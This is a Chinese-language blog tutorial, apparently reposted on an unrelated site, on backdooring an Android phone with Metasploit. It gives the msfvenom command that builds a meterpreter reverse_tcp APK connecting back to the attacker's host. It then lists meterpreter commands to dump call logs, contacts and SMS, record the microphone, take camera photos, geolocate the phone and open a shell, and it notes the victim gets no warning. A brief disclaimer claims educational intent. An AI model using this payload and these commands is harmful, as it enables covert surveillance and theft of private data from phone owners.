msf渗透android并植入后门 |
您所在的位置:网站首页 › msf入侵安卓手机关机 › msf渗透android并植入后门 |
前言
文中提及的部分技术,可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用!
正文
msf原名Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程 。团队合作,在Metasploit和综合报告提出了他们的发现。 环境 BackBox、kali linux、或者BackTrack(kali linux的前身) 一台安卓设备环境不说太多介绍了,直接来实战。 生成payload装好环境后查看自己的ip 生成一个payload msfvenom -p android/meterpreter/reverse_tcp LHOST=your_ip LPORT=your_port R > /root/apk.apk p 设置要使用的payload LHOST 设置用来接收反弹连接的主机 LPORT 设置用来接收反弹连接的端口很小,才8kb如果用的BackTrack,里面的msf是旧版本的了。旧版本的生成payload是msfpayload。生成的apk放到手机上安装,安装完成后是这样的。 启动msf
可以看到msf会一直在监听本机的2333端口,等待着目标连接上线然后我打开我们刚刚安装的打开后会连接到msf 我来介绍几个有意思的指令。 * check_root #查看是否root * dump_calllog #下载通讯记录 * dump_contacts #下载联系人 * dump_sms #下载短信 * send_sms #发送短信 * record_mic #录音 * webcam_list #查看手机摄像头 * webcam_snap #拍照 * webcam_stream #连续拍照 * geolocate #获取目标地理位置 * upload #上传文件到手机 * download #下载手机上的文件 * shell #进入手机的bash shell check_root(检测root)
![]() ![]() ![]()
![]() ![]() 这些操作都是可以在不用接触手机,而且手机也不会有任何提示下完成。所以同学们最好不要安装来历不明的app,后患无穷。 本文标题:msf渗透android并植入后门 文章作者:y00z 发布时间:2016-12-19, 15:32:08 最后更新:2017-07-13, 19:06:56 原始链接:http://y00z.github.io/2016/12/19/diary-2016-1219-01/ 许可协议: "署名-非商用-相同方式共享 3.0" 转载请保留原文链接及作者。 赏谢谢你请我吃糖果 ![]() ![]() |
今日新闻 |
推荐新闻 |
CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |